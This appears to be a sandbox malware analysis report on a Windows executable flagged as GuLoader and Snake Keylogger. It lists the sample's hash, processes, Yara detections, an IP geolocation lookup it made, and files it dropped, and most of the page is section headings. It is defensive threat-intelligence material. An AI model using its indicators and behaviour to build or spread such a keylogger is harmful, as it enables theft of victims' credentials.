2025-03-07 22:01:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	16:59:21
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\BtCQu5APhK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BtCQu5APhK.exe"
Imagebase:	0x400000
File size:	1'053'154 bytes
MD5 hash:	C80150383AF692D52BC33E7857B5724D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1690708492.000000000727F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:00:42
Start date:	07/03/2025
Path:	C:\Users\user\Desktop\BtCQu5APhK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BtCQu5APhK.exe"
Imagebase:	0x400000
File size:	1'053'154 bytes
MD5 hash:	C80150383AF692D52BC33E7857B5724D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.2149177368.0000000037F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report BtCQu5APhK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Desktop\Varda.ini

C:\Users\user\AppData\Local\Temp\Alpha.ini

C:\Users\user\AppData\Local\Temp\nsc7BB5.tmp

C:\Users\user\AppData\Local\Temp\nsf90F3.tmp

C:\Users\user\AppData\Local\Temp\nsg9317.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsi97FD.tmp

C:\Users\user\AppData\Local\Temp\nsl9337.tmp

C:\Users\user\AppData\Local\Temp\nss96B4.tmp

C:\Users\user\AppData\Local\Temp\nsw94AF.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\manxman.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\modstaaet.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\musicianer.spi

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\ndder.jpg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\romantiserendes.ini

Windows Analysis Report
BtCQu5APhK.exe